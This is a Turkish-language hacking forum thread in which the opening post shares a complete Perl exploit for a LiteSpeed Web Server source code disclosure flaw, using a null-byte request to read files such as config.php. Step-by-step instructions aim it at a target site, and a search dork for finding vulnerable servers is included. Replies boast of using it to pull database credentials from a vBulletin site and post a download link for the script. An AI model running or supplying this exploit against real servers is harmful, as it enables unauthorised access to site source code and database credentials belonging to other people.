




Litespeed Kaynak Kod Okuma Exploit (Config.Php Gibi)
-
Evet Arkadaşlar Hala Birçok LiteSpeed Server'da Bu Açık Olduğu İçin Paylaşıyorum.
Exploiti Kullanman İçin Bilgisayarında Perl Yüklü Olmalıdır Strawberry Perl öneririm
Aşağıda Vereceğim Exploit Kodlarını lite.pl olarak kaydet ve C:\Perl\Bin Klasörüne At
Sonra Başlat > Çalıştır > cmd
Gelen Ms-Dos Ekranına cd.. komutunu vererek C:\ dizinine kadar tekrarla C:\ ulaştıktan sonra
cd C:\perl\bin Yazıp Enter'la ve Sonra Exploit Kodumuzu Yazıyoruz
perl lite.pl www.hedefsitemiz.com config.php
bu komut sana doğrudan config.php dosyasının içeriğini verir :) yani rahatça okursun.
Exploit Kodları:
#!/usr/bin/perl # #LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day Exploit #By Kingcope #Google search: ""Proudly Served by LiteSpeed Web Server"" #June 2010 #Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556 # use IO::Socket; use strict; sub getphpsrc { my $host = shift; my $file = shift; if (substr($file, 0, 1) eq "/") { $file = substr($file, 1); } my $file2 = $file; $file2 =~ s/\//_/g; print "Saving source code of $file into $host-$file2\n"; my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => '80', Proto => 'tcp') || die("Could not connect to $ARGV[0]"); print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n"; my $buf = ""; my $lpfound = 0; my $saveme = 0; my $savveme = 0; while(<$sock>) { if ($_ =~ /LiteSpeed/) { $lpfound = 1; } if ($saveme == 2) { $savveme = 1; } if ($saveme != 0 && $savveme == 0) { $saveme++; } if ($_ =~ /Content-Length:/) { $saveme = 1; } if ($savveme == 1) { $buf .= $_; } } if ($lpfound == 0) { print "This does not seem to be a LiteSpeed Webserver, saving file anyways.\n"; } open FILE, ">$host-$file2"; print FILE $buf; close FILE; print "Completed.\n"; } print "LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit\n"; print "By Kingcope\n"; print "June 2010\n\n"; if ($#ARGV != 1) { print "Usage: perl litespeed.pl \n"; print "Example: perl litespeed.pl www.thedomain.com index.php\n"; exit(0); } getphpsrc($ARGV[0], $ARGV[1]); print "Operation Completed :>.\n";
Umarım Faydalı Olmuştur (:
-
wardom & hackhell bi ara buradan vurulmu$tu sanırım.
/opt/lsws/admin/misc/admpass.sh burdan pw'yi degistirebilir webmasterlar.
ayrıca 4.0.12 & 4.0.14'te de buna benzer acıklar vardı.
-
Andrei bunu yazdı:
-----------------------------
wardom & hackhell bi ara buradan vurulmu$tu sanırım.
/opt/lsws/admin/misc/admpass.sh burdan pw'yi degistirebilir webmasterlar.
ayrıca 4.0.12 & 4.0.14'te de buna benzer acıklar vardı.
-----------------------------evet (: hala bir çok Lite'de açık mevcut malesef.
-
BEGIN not safe after errors--compilation aborted at lite.pl line 12.
bunun anlamını bilen warmı :S
-
güzel paylaşım sağol dostum
-
kullananlar düşünsün :D
eskiden lite speed server kullanıyodum..
eleman config i gizlesin yine çözüm olur :D
-
DJ_Alper bunu yazdı:
-----------------------------
kullananlar düşünsün :D
eskiden lite speed server kullanıyodum..
eleman config i gizlesin yine çözüm olur :D
-----------------------------çözüm değil vBulletin config dosyasını gizlediğini varsayarsak vB sistem dosyalarından birinde config yolu yazıyor onu okuyup amacıma ulaşmıştım (:
Not: çektiğiniz dosyalar C:\Perl\bin içine gider.
-
config dosyasını okumak garanti hack yolu değil%15 ihtimalin var hacklemek için.
-
EcHoLL bunu yazdı:
-----------------------------
config dosyasını okumak garanti hack yolu değil%15 ihtimalin var hacklemek için.
-----------------------------zaten orda garanti hack yazmıyor config dosyasındaki database bilgilerine erişilip birşeyler yapılabilir.
-
exploit'de sorun yaşayanlar
http://rapidshare.com/files/413915958/lite.plkendi upload'ım.